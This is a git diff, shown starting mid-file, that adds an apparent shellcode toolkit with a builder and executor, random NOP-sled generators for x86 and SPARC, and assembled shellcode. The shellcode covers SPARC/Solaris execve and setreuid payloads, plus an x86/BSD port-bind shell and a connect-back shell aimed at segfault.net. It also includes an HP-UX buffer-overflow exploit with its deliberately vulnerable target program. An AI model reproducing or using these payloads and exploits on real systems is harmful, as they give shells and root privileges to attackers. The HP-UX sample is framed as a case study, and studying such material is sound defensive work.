list\n\n"); + printf ("the shellkit utility will build a chained block of codes described by the\n" + "given code identifiers, copy it to a writeable place of memory and will\n" + "do anything necessary to execute this block of code on your architecture.\n" + "before executing the code the environments specified are installed.\n" + "you can - of course - only execute code for your architecture.\n\n"); + + exit (EXIT_FAILURE); +} + + +void +env_list (void) +{ + printf ("list of available environments:\n\n"); + + exit (EXIT_SUCCESS); +} + + +void +sc_list (void) +{ + int sc_walker; + int arch_walker; + arch * a; + + + for (arch_walker = 0 ; shellcodes[arch_walker] != NULL ; + ++arch_walker) + { + a = shellcodes[arch_walker]; + + printf ("%s:\n", a->arch_string); + for (sc_walker = 0 ; a->arch_codes[sc_walker] != NULL ; + ++sc_walker) + { + printf ("\t%-30s %3d\n", + a->arch_codes[sc_walker]->code_string, + a->arch_codes[sc_walker]->code_len); + } + printf ("\n"); + } + + exit (EXIT_SUCCESS); +} + + +int +main (int argc, char *argv[]) +{ + int c; + int xenvc = 0; + char * xenv[16]; + + + random_init (); + memset (xenv, '\x00', sizeof (xenv)); + + if (argc < 2) + sc_list (); + + while ((c = getopt (argc, argv, "hdlxe:")) != -1) { + switch (c) { + case 'h': + usage (); + break; + case 'd': + dump = 1; + break; + case 'l': + sc_list (); + break; + case 'x': + execute = 1; + break; + case 'e': + if (strcmp (optarg, "list") == 0) + env_list (); + if (xenvc >= 15) { + fprintf (stderr, "insane, huh? dont mess\n"); + exit (EXIT_FAILURE); + } + xenv[xenvc++] = optarg; + break; + default: + usage (); + break; + } + } + + exit (EXIT_SUCCESS); +} + + diff --git a/other/shellkit/shellkit.h b/other/shellkit/shellkit.h new file mode 100644 index 0000000..074fd65 --- /dev/null +++ b/other/shellkit/shellkit.h @@ -0,0 +1,31 @@ +/* shellkit.h - main shellcode kit definition file + * + * everything is merged here. + * + * team teso + */ + +#ifndef SHELLKIT_H +#define SHELLKIT_H + +#include "shellcode.h" + +/* individual architectures */ +#include "hppa_hpux.h" +#include "mips_irix.h" +#include "sparc_solaris.h" +#include "x86_bsd.h" +#include "x86_linux.h" + +arch * shellcodes[] = { + &hppa_hpux, + &mips_irix, + &sparc_solaris, + &x86_bsd, + &x86_linux, + NULL, +}; + + +#endif + diff --git a/other/shellkit/sparc.c b/other/shellkit/sparc.c new file mode 100644 index 0000000..45fe647 --- /dev/null +++ b/other/shellkit/sparc.c @@ -0,0 +1,140 @@ +/* sparc.c - generic sparc functions + * + * by team teso + */ + +#include +#include +#include "shellcode.h" +#include "sparc.h" + + +static int sparc_torf (void); +static unsigned long int sparc_getinstr (unsigned char *pat, + unsigned char *bad, int bad_len); + + +static int +sparc_torf (void) +{ + return (random_get (0, 1)); +} + + +static unsigned long int +sparc_getinstr (unsigned char *pat, unsigned char *bad, int bad_len) +{ + int x; /* bitfield walker */ + unsigned char bc = 0; + unsigned long int i = 0; /* generated instruction */ + + + for (x = 31 ; x > 0 ; --x) { + + switch (pat[x]) { + case '.': + if (badstr (&bc, 1, bad, bad_len)) { + /*x -= 8;*/ + printf ("redo byte! #muh\n"); + } + bc = 0; + break; + + case '0': + break; + + case '1': + i |= (1 << x); + bc |= (1 << (x % 8)); + break; + + case 'v': + if (badstr (&bc, 1, bad, bad_len)) { + i |= (1 << x); + bc |= (1 << (x % 8)); + } else if (sparc_torf ()) { + i |= (1 << x); + bc |= (1 << (x % 8)); + } + break; + + case 'r': + case 'f': + case 's': + if (badstr (&bc, 1, bad, bad_len)) { + i |= (1 << x); + bc |= (1 << (x % 8)); + } else if (sparc_torf ()) { + i |= (1 << x); + bc |= (1 << (x % 8)); + } + break; + default: + fprintf (stderr, "sorry, can not generate nop's for " + "trinary sparcs ...\n"); + + exit (EXIT_FAILURE); + break; + } + } + + return (i); +} + + +/* XXX: DO NOT USE UNTESTED! */ +unsigned int +sparc_nop (unsigned char *dest, unsigned int dest_len, + unsigned char *bad, int bad_len) +{ + unsigned long int * dest_p = NULL; + unsigned int count = 0; + + /* abstract representation of a sparc instruction. + * '1', '0': real bits of the instruction + * 'r', 'f', 's': destination, first and second source register + * 'v': either a 1 or 0 bit (any value) + * + * for details see "The SPARC Architecture Manual", chapter 5 + * ("Instructions") and appendix F + B. + */ + unsigned char * pat = NULL; + unsigned char * instr_format[] = { + "10rrrrr0.00011fff.ff000000.000sssss", + "10rrrrr0.00011fff.ff1vvvvv.vvvvvvvv", /* xor */ + + "10rrrrr0.00111fff.ff000000.000sssss", + "10rrrrr0.00111fff.ff1vvvvv.vvvvvvvv", /* xnor */ + + "10rrrrr0.00100fff.ff000000.000sssss", + "10rrrrr0.00100fff.ff1vvvvv.vvvvvvvv", /* sub */ + + "10rrrrr0.00010fff.ff000000.000sssss", + "10rrrrr0.00010fff.ff1vvvvv.vvvvvvvv", /* or */ + + "10rrrrr0.00000fff.ff000000.000sssss", + "10rrrrr0.00000fff.ff1vvvvv.vvvvvvvv", /* add */ + + "10rrrrr0.00001fff.ff000000.000sssss", + "10rrrrr0.00001fff.ff1vvvvv.vvvvvvvv", /* and */ + + /* XXX/TODO: add more codes */ + + NULL, + }; + + + /* take care of instruction size + */ + dest_len = dest_len - (dest_len % 4); + dest_p = (unsigned long int *) dest; + + for ( ; count < dest_len ; count += 4) { + pat = instr_format[rand () % 12]; + *dest_p++ = sparc_getinstr (pat, bad, bad_len); + } + + return (count); +} + + diff --git a/other/shellkit/sparc.h b/other/shellkit/sparc.h new file mode 100644 index 0000000..bf5bd93 --- /dev/null +++ b/other/shellkit/sparc.h @@ -0,0 +1,10 @@ + +#ifndef SPARC_H +#define SPARC_H + +unsigned int +sparc_nop (unsigned char *dest, unsigned int dest_len, + unsigned char *bad, int bad_len); + +#endif + diff --git a/other/shellkit/sparc.o b/other/shellkit/sparc.o new file mode 100644 index 0000000..22f52c8 Binary files /dev/null and b/other/shellkit/sparc.o differ diff --git a/other/shellkit/sparc_solaris.c b/other/shellkit/sparc_solaris.c new file mode 100644 index 0000000..ce44a1a --- /dev/null +++ b/other/shellkit/sparc_solaris.c @@ -0,0 +1,58 @@ +#include +#include +#include +#include "shellcode.h" +#include "sparc.h" + + +shellcode sparc_solaris_execvesh = { + "sparc-solaris-execve", + 48, + "\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xdc\xda" + "\x90\x03\xa0\x08\x92\x13\x80\x0e\x9c\x03\xa0\x10" + "\x94\x1b\x80\x0e\xec\x3b\xbf\xf8\xd0\x23\xbf\xf0" + "\xd4\x23\xbf\xf4\x82\x10\x20\x3b\x91\xd0\x20\x08", +}; + + +shellcode sparc_solaris_exit = { + "sparc-solaris-exit", + 8, + "\x82\x10\x20\x01\x91\xd0\x20\x08", +}; + + +shellcode sparc_solaris_setgid = { + "sparc-solaris-setgid", + 16, + "\x90\x10\x21\x42\x90\x1a\x21\x44\x82\x10\x20\x2e" + "\x91\xd0\x20\x08", +}; + + +shellcode sparc_solaris_setreuid = { + "sparc-solaris-setreuid", + 24, + "\x90\x10\x21\x42\x90\x1a\x21\x44\x92\x10\x21\x46" + "\x92\x1a\x61\x48\x82\x10\x20\x2e\x91\xd0\x20\x08", +}; + + +shellcode * sparc_solaris_shellcodes[] = { + &sparc_solaris_execvesh, + &sparc_solaris_exit, + &sparc_solaris_setgid, + &sparc_solaris_setreuid, + NULL, +}; + + +arch sparc_solaris = { + "sparc-solaris", + 4, + sparc_nop, + sparc_solaris_shellcodes +}; + + + diff --git a/other/shellkit/sparc_solaris.h b/other/shellkit/sparc_solaris.h new file mode 100644 index 0000000..24419e3 --- /dev/null +++ b/other/shellkit/sparc_solaris.h @@ -0,0 +1,6 @@ +#ifndef SPARC_SOLARIS_H +#define SPARC_SOLARIS_H + +arch sparc_solaris; + +#endif diff --git a/other/shellkit/sparc_solaris.o b/other/shellkit/sparc_solaris.o new file mode 100644 index 0000000..0b98d72 Binary files /dev/null and b/other/shellkit/sparc_solaris.o differ diff --git a/other/shellkit/sparc_solaris/AUTHORS b/other/shellkit/sparc_solaris/AUTHORS new file mode 100644 index 0000000..01bb209 --- /dev/null +++ b/other/shellkit/sparc_solaris/AUTHORS @@ -0,0 +1,2 @@ +palmers / teso +smiler / teso diff --git a/other/shellkit/sparc_solaris/NOTES b/other/shellkit/sparc_solaris/NOTES new file mode 100644 index 0000000..166eccc --- /dev/null +++ b/other/shellkit/sparc_solaris/NOTES @@ -0,0 +1,11 @@ +would this shellcodes work in sparc NetBSD or SunOS? +would require "ta 0" instead of "ta8"? + + +todo: +connect +bind +chmod +read +spset + diff --git a/other/shellkit/sparc_solaris/execve.s b/other/shellkit/sparc_solaris/execve.s new file mode 100644 index 0000000..0a0c11b --- /dev/null +++ b/other/shellkit/sparc_solaris/execve.s @@ -0,0 +1,20 @@ + .globl cbegin + .globl cend + +cbegin: + + sethi 0xbd89a, %l6 + or %l6, 0x16e, %l6 + sethi 0xbdcda, %l7 + add %sp, 8, %o0 + or %sp, %sp, %o1 + add %sp, 16, %sp + xor %o6, %o6, %o2 + std %l6, [%sp - 8] + st %o0, [%sp - 16] + st %o2, [%sp - 12] + mov 0x3b, %g1 + ta 8 + +cend: + diff --git a/other/shellkit/sparc_solaris/exit.s b/other/shellkit/sparc_solaris/exit.s new file mode 100644 index 0000000..3019a42 --- /dev/null +++ b/other/shellkit/sparc_solaris/exit.s @@ -0,0 +1,10 @@ + .globl cbegin + .globl cend + +cbegin: + + mov 0x1, %g1 + ta 0x8 + +cend: + diff --git a/other/shellkit/sparc_solaris/setgid.s b/other/shellkit/sparc_solaris/setgid.s new file mode 100644 index 0000000..c307065 --- /dev/null +++ b/other/shellkit/sparc_solaris/setgid.s @@ -0,0 +1,12 @@ + .globl cbegin + .globl cend + +cbegin: + + mov 0x4142, %o0 + xor 0x4344, %o0, %o0 + mov 0x2e, %g1 + ta 0x8 + +cend: + diff --git a/other/shellkit/sparc_solaris/setreuid.s b/other/shellkit/sparc_solaris/setreuid.s new file mode 100644 index 0000000..e17c375 --- /dev/null +++ b/other/shellkit/sparc_solaris/setreuid.s @@ -0,0 +1,14 @@ + .globl cbegin + .globl cend + +cbegin: + + mov 0x4142, %o0 + xor 0x4344, %o0, %o0 + mov 0x4546, %o1 + xor 0x4748, %o1, %o1 + mov 0xca, %g1 + ta 0x8 + +cend: + diff --git a/other/shellkit/splocoder b/other/shellkit/splocoder new file mode 100644 index 0000000..6828783 Binary files /dev/null and b/other/shellkit/splocoder differ diff --git a/other/shellkit/splocoder.c b/other/shellkit/splocoder.c new file mode 100644 index 0000000..96e36f8 --- /dev/null +++ b/other/shellkit/splocoder.c @@ -0,0 +1,184 @@ +/* + + A tool for the young exploit coder, Copyright (c) acpizer, 2001. + +*/ + +#include +#include +#include + + +char small_global[] = "acpizer"; + +int uninitialized_global; + + +int endianess() { + union { + long l; + char c[sizeof (long)]; + } u; + + u.l = 1; + + return (u.c[sizeof (long) - 1] == 1); +} + + +static int iterate = 10; + +int stack_growsdown(int *x) { + auto int y; + + + y = (x > &y); + + if (--iterate > 0) + y = stack_growsdown(&y); + + if (y != (x > &y)) + exit(1); + + return y; +} + +typedef struct { + char * sys_name; + char * sys_release; + char * sys_version; + char * sys_machine; + + unsigned long int malloc_zero; + unsigned long int malloc_neg; + unsigned long int malloc_big; + + unsigned long int malloc_small; + unsigned long int malloc_tiny; + + unsigned long int bss; + unsigned long int data; + + int sizeof_int; + int sizeof_voidptr; + + unsigned long int env_start; + + unsigned long int frame_addr; + + int stack_down; + int endian_big; +} sys_def; + +sys_def this; + + +int +main (int argc, char *argv[], char *env[]) +{ + struct utsname uts; + + char localstack[5]; + auto int x; + + + printf("splocoder, v1.0 by acpizer & sc -- team teso.\n\n"); + + uname (&uts); + + this.sys_name = uts.sysname; + this.sys_release = uts.release; + this.sys_version = uts.version; + this.sys_machine = uts.machine; + +#ifdef VERBOSE + printf("System: %s %s %s %s\n\n", uts.sysname, uts.release, uts.version, + uts.machine); +#endif + + this.malloc_zero = (unsigned long int) malloc (0); + this.malloc_neg = (unsigned long int) malloc (-4); + this.malloc_big = (unsigned long int) malloc (1024 * 1024); + +#ifdef VERBOSE + printf("malloc(0) returns: 0x%08lx\n", this.malloc_zero); + printf("malloc(-4) returns: 0x%08lx\n", this.malloc_neg); + printf("Big heap: 0x%08lx\n", this.malloc_big); +#endif + + /* There might be a differece, depending on malloc implementation. */ + this.malloc_small = (unsigned long int) malloc (100); + this.malloc_tiny = (unsigned long int) malloc (5); + +#ifdef VERBOSE + printf("Small heap: 0x%08lx\n", this.malloc_small); + printf("Tiny heap: 0x%08lx\n\n", this.malloc_tiny); +#endif + + + this.bss = (unsigned long int) &uninitialized_global; + this.data = (unsigned long int) &small_global; + +#ifdef VERBOSE + printf("bss is at: 0x%08lx\n", this.bss); + printf("Initialized global data is at: 0x%08lx\n\n", this.data); +#endif + + + this.sizeof_int = sizeof (int); + this.sizeof_voidptr = sizeof (void *); + +#ifdef VERBOSE + printf("sizeof(int): %d\n", this.sizeof_int); + printf("sizeof(void *): %d\n\n", this.sizeof_voidptr); +#endif + + + this.env_start = (unsigned long int) &env[0]; +#ifdef VERBOSE + printf("environ[0]: 0x%08lx\n\n", this.env_start); +#endif + + this.frame_addr = (unsigned long int) &localstack; +#ifdef VERBOSE + printf("Local stack variable is at 0x%08lx\n", this.frame_addr); +#endif + + this.stack_down = stack_growsdown (&x) ? 1 : 0; +#ifdef VERBOSE + printf("Stack growth direction: %s\n", this.stack_down ? "down" : "up"); +#endif + + this.endian_big = endianess () ? 1 : 0; +#ifdef VERBOSE + printf("Endianess: %s\n\n", this.endian_big ? "big" : "little"); +#endif + + + { + char sys[30]; + + snprintf (sys, sizeof (sys), "%s-%s-%s", this.sys_name, + this.sys_release, this.sys_machine); + fprintf (stderr, "%-32s ", sys); + } + fprintf (stderr, "%s %-10s ", this.endian_big ? "be" : "le", + this.stack_down ? "stackdown" : "stackup"); + fprintf (stderr, "%3d %3d\n", + this.sizeof_int, this.sizeof_voidptr); + + fprintf (stderr, "%-33s%08lx %08lx %08lx %08lx", + " data bss stack env", + this.data, this.bss, + this.frame_addr, this.env_start); + fprintf (stderr, "\n"); + + fprintf (stderr, "%-33s%08lx %08lx %08lx %08lx %08lx ", + " M: zero neg big small tiny", + this.malloc_zero, this.malloc_neg, this.malloc_big, + this.malloc_small, this.malloc_tiny); + fprintf (stderr, "\n"); + + exit (EXIT_SUCCESS); +} + diff --git a/other/shellkit/tmp/hpux-tools.tar.gz b/other/shellkit/tmp/hpux-tools.tar.gz new file mode 100644 index 0000000..6fa3a5e Binary files /dev/null and b/other/shellkit/tmp/hpux-tools.tar.gz differ diff --git a/other/shellkit/tmp/hpux-tools/Makefile b/other/shellkit/tmp/hpux-tools/Makefile new file mode 100644 index 0000000..19e8fd4 --- /dev/null +++ b/other/shellkit/tmp/hpux-tools/Makefile @@ -0,0 +1,5 @@ +all: sample-one shell-one shell-two shell-tree + + +sample-one: + @cd sample-one && make diff --git a/other/shellkit/tmp/hpux-tools/README b/other/shellkit/tmp/hpux-tools/README new file mode 100644 index 0000000..b6ee0df --- /dev/null +++ b/other/shellkit/tmp/hpux-tools/README @@ -0,0 +1,10 @@ +This archive contains following files: +Makefile - make file to build the stuff +sample-one - example of exploit and vulnerable program +shell-one.s - shellcode (v1) +shell-tree.s - shellcode (v2) +shell-two.s - shellcode (v3) + + +-- +fygrave@tigerteam.net diff --git a/other/shellkit/tmp/hpux-tools/sample-one/Makefile b/other/shellkit/tmp/hpux-tools/sample-one/Makefile new file mode 100644 index 0000000..aea8390 --- /dev/null +++ b/other/shellkit/tmp/hpux-tools/sample-one/Makefile @@ -0,0 +1,10 @@ +all: exploit vuln + +exploit: exploit.c + gcc exploit.c -o exploit +vuln: vuln.c + gcc vuln.c -o vuln + + +clean: + @rm -f core *.core *.o vuln exploit a.out diff --git a/other/shellkit/tmp/hpux-tools/sample-one/README b/other/shellkit/tmp/hpux-tools/sample-one/README new file mode 100644 index 0000000..66be971 --- /dev/null +++ b/other/shellkit/tmp/hpux-tools/sample-one/README @@ -0,0 +1,5 @@ +These are examples for HP-UX buffer overflow case study. For more information +please see http://www.notlsd.net/bof/ + +-- +fygrave@tigerteam.net Tue Mar 20 15:41:48 ICT 2001 diff --git a/other/shellkit/tmp/hpux-tools/sample-one/exploit.c b/other/shellkit/tmp/hpux-tools/sample-one/exploit.c new file mode 100644 index 0000000..11dc23c --- /dev/null +++ b/other/shellkit/tmp/hpux-tools/sample-one/exploit.c @@ -0,0 +1,123 @@ +/* + * Sample exploit for HP-UX buffer overflows case study + */ +#include +#include + + +char shellcode[]= +"\xe8\x3f\x1f\xfd\xb4\x23\x03\xe8\x60\x60\x3c\x61\x0b\x39\x02" +"\x99\x34\x1a\x3c\x53\x0b\x43\x06\x1a\x20\x20\x08\x01\x34\x16\x03" +"\xe8\xe4\x20\xe0\x08\x96\xd6\x03\xfe/bin/shA"; + +#define BUFFER_SIZE 180 +#define STACK_DSO -84 +#define NOP 0x0b390280 +#define PAD 0 +#define ALIGN 8 +#define ADB_PATH "/usr/bin/adb" +#define VULNVAR "VULNBUF=" +#define MORE 1 + + +unsigned long get_sp(void) +{ + __asm__("copy %sp,%ret0 \n"); +} + +int main(int argc, char **argv) { +int i, dso, align, padd, buf_size, adb, more; +char *buf, *ptr; +unsigned long retaddr; + + +dso = STACK_DSO; +align = ALIGN; +padd = PAD; +buf_size = BUFFER_SIZE; +retaddr = 0; +more = MORE; + + + + +while ((i = getopt(argc, argv, + "Dd:b:r:o:a:p:m:")) != EOF) { + switch (i) { + case 'd': + dso=(int) strtol(optarg, NULL, 0); + break; + case 'm': + more+=(int) strtol(optarg, NULL, 0); + break; + case 'b': + buf_size=(int)strtol(optarg, NULL, 0); + break; + case 'r': + retaddr = strtoul(optarg, NULL, 0); + break; + case 'a': + align = (int) strtol(optarg, NULL, 0); + break; + case 'p': + padd = (int) strtol(optarg, NULL, 0); + break; + case 'D': + adb = 1; + break; + default: + fprintf(stderr, "usage: %s [-b buffer_size] [-d dso] " + "[-r return_address]" + "[-a align] [-p pad] [-D] [-m more_rets]\n", argv[0]); + exit(1); + break; + } +} + + +buf=(char *)calloc(strlen(VULNVAR) + buf_size + + sizeof(unsigned long)*more + 1, 1); +ptr=buf; +if (!buf) { + perror("calloc"); + exit(1); +} + +fprintf(stderr,"our stack %X\n",get_sp()); +if (!retaddr) + retaddr=get_sp()- dso + 3; +fprintf(stderr, "Using: ret: 0x%X pad: %i align: %i" + " buf_len: %i dso: %i more: %i\n", + retaddr, padd, align, buf_size, dso, more); + +strcpy(buf, VULNVAR); +ptr+=strlen(VULNVAR); +for(i=0;i>24)&0xff; + *ptr++=(NOP>>16)&0xff; + *ptr++=(NOP>>8)&0xff; + *ptr++=(NOP)&0xff; +} + +strcat(buf, shellcode); // append shellcode +ptr+=strlen(shellcode); + +for(i=0;i>24)&0xff; + *ptr++=(retaddr>>16)&0xff; + *ptr++=(retaddr>>8)&0xff; + *ptr++=(retaddr)&0xff; +} +fprintf(stderr,"buflen is %i\n", strlen(buf)); +putenv(buf,1); +if (adb) + execl(ADB_PATH,"adb","vuln", NULL); +else + execl("./vuln","vuln",buf, NULL); +perror("execl"); +return 0; // uff +} diff --git a/other/shellkit/tmp/hpux-tools/sample-one/vuln.c b/other/shellkit/tmp/hpux-tools/sample-one/vuln.c new file mode 100644 index 0000000..698af76 --- /dev/null +++ b/other/shellkit/tmp/hpux-tools/sample-one/vuln.c @@ -0,0 +1,34 @@ +/* + * Sample vulnerable program for HP-UX buffer overflows case study + */ +#include +#include + + +unsigned long get_sp(void) +{ + __asm__("copy %sp,%ret0 \n"); +} + +void baz(char *argument) { + char badbuf[200]; + + printf("badbuf ptr is: %p\n",badbuf); + strcpy(badbuf,argument); +} + +void foo(char *arg) { + + baz(arg); + +} + +int main(int argc, char **argv) { +char *param; + +printf("vuln stack is: 0x%X\n",get_sp()); +param=getenv("VULNBUF"); +foo(param); + +return 0; +} diff --git a/other/shellkit/tmp/hpux-tools/shell-one.s b/other/shellkit/tmp/hpux-tools/shell-one.s new file mode 100644 index 0000000..afbf9f8 --- /dev/null +++ b/other/shellkit/tmp/hpux-tools/shell-one.s @@ -0,0 +1,39 @@ + .SPACE $TEXT$ + .SUBSPA $CODE$,QUAD=0,ALIGN=8,ACCESS=44 + + .align 4 + .EXPORT main,ENTRY,PRIV_LEV=3,ARGW0=GR,ARGW1=GR +main + + bl shellcode, %r1 + nop + .SUBSPA $DATA$ + .EXPORT shellcode; So we could see it in debugger +shellcode + xor %r26, %r26, %r26; 0 - argv0 + ldil L%0xc0000000,%r1; entry point + ble 0x4(%sr7,%r1) ; + ldi 23, %r22 + +jump + bl .+8,%r1 ; address into %r1 + nop + stb %r0, SHELL-jump+7-11(%sr0,%r1) + + xor %r25, %r25, %r25; NULL ->arg1 + ldi SHELL-jump-11, %r26; + add %r1, %r26, %r26; + + ldil L%0xc0000000,%r1; entry point + ble 0x4(%sr7,%r1) ; + ldi 11, %r22; + + xor %r26, %r26, %r26; return 0 + ldil L%0xc0000000,%r1; entry point + ble 0x4(%sr7,%r1) ; + ldi 1, %r22 ; exit + +SHELL + .STRING "/bin/shA"; + +endofshellcode diff --git a/other/shellkit/tmp/hpux-tools/shell-tree.s b/other/shellkit/tmp/hpux-tools/shell-tree.s new file mode 100644 index 0000000..c3044da --- /dev/null +++ b/other/shellkit/tmp/hpux-tools/shell-tree.s @@ -0,0 +1,31 @@ + .SPACE $TEXT$ + .SUBSPA $CODE$,QUAD=0,ALIGN=8,ACCESS=44 + + .align 4 + .EXPORT main,ENTRY,PRIV_LEV=3,ARGW0=GR,ARGW1=GR +main + + bl shellcode, %r1 + nop + .SUBSPA $DATA$ + .EXPORT shellcode; So we could see it in debugger +shellcode + + bl .+4,%r1 ; address into %r1 + addi 500, %r1, %r3; + stb %r0, SHELL-shellcode+7-11-500(%sr0,%r3) + + xor %r25, %r25, %r25; NULL ->arg1 + ldi SHELL-shellcode-11-500, %r26; + add %r3, %r26, %r26; + + ldil L%0xc0000000,%r1; entry point + ldi 500, %r22 ; + ble 0x4(%sr7,%r1) ; + subi 511, %r22, %r22 ; + + +SHELL + .STRING "/bin/shA"; + +endofshellcode diff --git a/other/shellkit/tmp/hpux-tools/shell-two.s b/other/shellkit/tmp/hpux-tools/shell-two.s new file mode 100644 index 0000000..5dac10f --- /dev/null +++ b/other/shellkit/tmp/hpux-tools/shell-two.s @@ -0,0 +1,41 @@ + .SPACE $TEXT$ + .SUBSPA $CODE$,QUAD=0,ALIGN=8,ACCESS=44 + + .align 4 + .EXPORT main,ENTRY,PRIV_LEV=3,ARGW0=GR,ARGW1=GR +main + + bl shellcode, %r1 + nop + .SUBSPA $DATA$ + .EXPORT shellcode; So we could see it in debugger +shellcode + xor %r26, %r26, %r26; 0 - argv0 + ldil L%0xc0000000,%r1; entry point + ldi 500, %r22 ; + ble 0x4(%sr7,%r1) ; + subi 523, %r22, %r22 ; setuid(0) +jump + bl .+4,%r1 ; address into %r1 + addi 500, %r1, %r3; + stb %r0, SHELL-jump+7-11-500(%sr0,%r3) + + xor %r25, %r25, %r25; NULL ->arg1 + ldi SHELL-jump-11-500, %r26; + add %r3, %r26, %r26; + + ldil L%0xc0000000,%r1; entry point + ldi 500, %r22 ; + ble 0x4(%sr7,%r1) ; + subi 511, %r22, %r22 ; + + xor %r26, %r26, %r26; return 0 + ldil L%0xc0000000,%r1; entry point + ldi 500, %r22 ; + ble 0x4(%sr7,%r1) ; + subi 501, %r22, %r22 ; exit + +SHELL + .STRING "/bin/shA"; + +endofshellcode diff --git a/other/shellkit/tmp/hpux_bof.pdf b/other/shellkit/tmp/hpux_bof.pdf new file mode 100644 index 0000000..6d2a957 Binary files /dev/null and b/other/shellkit/tmp/hpux_bof.pdf differ diff --git a/other/shellkit/x86.c b/other/shellkit/x86.c new file mode 100644 index 0000000..dd580c6 --- /dev/null +++ b/other/shellkit/x86.c @@ -0,0 +1,124 @@ +/* x86.c - generic x86 functions + * + * by team teso + */ + +#include +#include +#include "shellcode.h" +#include "x86.h" + + +static unsigned long int x86_nop_rwreg (void); +static unsigned long int x86_nop_xfer (char *xferstr); + + +static unsigned long int +x86_nop_rwreg (void) +{ + unsigned long int reg; + + do { + reg = random_get (0, 7); + } while (reg == 4); /* 4 = $esp */ + + return (reg); +} + + +static unsigned long int +x86_nop_xfer (char *xferstr) +{ + int bw = 0; /* bitfield walker */ + unsigned char tgt; /* resulting instruction */ + + /* in a valid xferstr we trust */ + for (tgt = 0 ; xferstr != NULL && xferstr[0] != '\0' ; ++xferstr) { + switch (xferstr[0]) { + case ('0'): + BSET (tgt, 1, 0, bw); + break; + case ('1'): + BSET (tgt, 1, 1, bw); + break; + case ('r'): + BSET (tgt, 3, x86_nop_rwreg (), bw); + break; + case ('.'): + break; /* ignore */ + default: + fprintf (stderr, "on steroids, huh?\n"); + exit (EXIT_FAILURE); + break; + } + } + + if (bw != 8) { + fprintf (stderr, "invalid bitwalker: bw = %d\n", bw); + exit (EXIT_FAILURE); + } + + return (tgt); +} + + +unsigned int +x86_nop (unsigned char *dest, unsigned int dest_len, + unsigned char *bad, int bad_len) +{ + int walk; + int bcount; /* bad counter */ + char * xs; + char * xferstr[] = { + "0011.0111", /* aaa */ + "0011.1111", /* aas */ + "1001.1000", /* cbw */ + "1001.1001", /* cdq */ + "1111.1000", /* clc */ + "1111.1100", /* cld */ + "1111.0101", /* cmc */ + "0010.0111", /* daa */ + "0010.1111", /* das */ + "0100.1r", /* dec */ + "0100.0r", /* inc */ + "1001.1111", /* lahf */ + "1001.0000", /* nop */ + "1111.1001", /* stc */ + "1111.1101", /* std */ + "1001.0r", /* xchg al, */ + NULL, + }; + unsigned char tgt; + +/* + * XXX: those nops are only one byte long. they could be used as byte values + * in opcodes like mov (add, sub, or, ...) as value. that would increase the + * randomness of the string. since the value is "nop save" we have no problem + * if the execution starts within this nop. + * now, having word sized nops, even larger nops are possible (again increasssing + * the randomness of the nop string). + * however, its a little complicated ;) + */ + + for (walk = 0 ; dest_len > 0 ; dest_len -= 1 , walk += 1) { + /* avoid endless loops on excessive badlisting */ + for (bcount = 0 ; bcount < 16384 ; ++bcount) { + xs = xferstr[random_get (0, 15)]; + tgt = x86_nop_xfer (xs); + + dest[walk] = tgt; + if (badstr (&dest[walk], 1, bad, bad_len) == 0) + break; + } + + /* should not happen */ + if (bcount >= 16384) { + fprintf (stderr, "too much blacklisting, giving up...\n"); + exit (EXIT_FAILURE); + } + } + + return (walk); +} + + diff --git a/other/shellkit/x86.h b/other/shellkit/x86.h new file mode 100644 index 0000000..f902a38 --- /dev/null +++ b/other/shellkit/x86.h @@ -0,0 +1,21 @@ + +#ifndef X86_H +#define X86_H + +#define x86_TERMINATOR "\x78\x56\x34\x12" + + +/* x86_nop + * + * generate `dest_len' bytes of nopspace at `dest', which does not contain + * any of the characters in `bad', which is `bad_len' bytes long. + * + * return number of bytes generated + */ + +unsigned int +x86_nop (unsigned char *dest, unsigned int dest_len, + unsigned char *bad, int bad_len); + +#endif + diff --git a/other/shellkit/x86.o b/other/shellkit/x86.o new file mode 100644 index 0000000..5aa43d4 Binary files /dev/null and b/other/shellkit/x86.o differ diff --git a/other/shellkit/x86_bsd.c b/other/shellkit/x86_bsd.c new file mode 100644 index 0000000..1946250 --- /dev/null +++ b/other/shellkit/x86_bsd.c @@ -0,0 +1,73 @@ + +#include +#include +#include +#include "shellcode.h" +#include "x86.h" + + +/* ATTENTION: this must be first of concated shellcodes and the last + one must be terminated with x86_TERMINATOR */ +shellcode x86_bsd_spset = { + "x86-bsd-spset", + 20, + "\xb8\x78\x56\x34\x12\x99\xb6\x02\x5b\x53\x44\x4a" + "\x74\x06\x39\xc3\x74\xf3\xeb\xf4" +}; + + +/* ATTENTION: connects to segfault.net at the moment */ +shellcode x86_bsd_connectsh = { + "x86-bsd-connectsh", + 66, + "\x31\xed\xf7\xe5\x55\x45\x55\x45\x55\xb0\x61\x55" + "\xcd\x80\x96\x68\xc3\x58\xb0\xca\x66\x68\x44\x44" + "\x66\x55\x89\xe7\x6a\x10\x57\x56\x56\x6a\x62\x58" + "\xcd\x80\x60\xb0\x5a\xcd\x80\x4d\x79\xf8\x52\x89" + "\xe3\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x60" + "\x5e\x5e\xb0\x3b\xcd\x80" +}; + +shellcode x86_bsd_portshellsh = { + "x86-bsd-portshellsh", + 73, + "\x31\xdb\xf7\xe3\x53\x43\x53\x43\x53\xb0\x61\x53" + "\xcd\x80\x96\x52\x66\x68\x44\x44\x66\x53\x89\xe5" + "\x6a\x10\x55\x56\x56\x6a\x68\x58\xcd\x80\xb0\x6a" + "\xcd\x80\x60\xb0\x1e\xcd\x80\x53\x50\x50\xb0\x5a" + "\xcd\x80\x4b\x79\xf6\x52\x89\xe3\x68\x6e\x2f\x73" + "\x68\x68\x2f\x2f\x62\x69\x60\x5e\x5e\xb0\x3b\xcd" + "\x80" +}; + +shellcode x86_bsd_execvesh = { + "x86-bsd-execvesh", + 22, + "\x6a\x3b\x58\x99\x52\x89\xe3\x68\x6e\x2f\x73\x68" + "\x68\x2f\x2f\x62\x69\x60\x5e\x5e\xcd\x80" +}; + +shellcode x86_bsd_exit = { + "x86-bsd-exit", + 5, + "\x31\xc0\x40\xcd\x80" +}; + + +shellcode * x86_bsd_shellcodes[] = { + &x86_bsd_execvesh, /* TODO: add other shellcodes here */ + &x86_bsd_exit, + &x86_bsd_portshellsh, + &x86_bsd_connectsh, + &x86_bsd_spset, + NULL, +}; + +arch x86_bsd = { + "x86-bsd", + 1, + x86_nop, + x86_bsd_shellcodes, +}; + + diff --git a/other/shellkit/x86_bsd.h b/other/shellkit/x86_bsd.h new file mode 100644 index 0000000..8a7b1ba --- 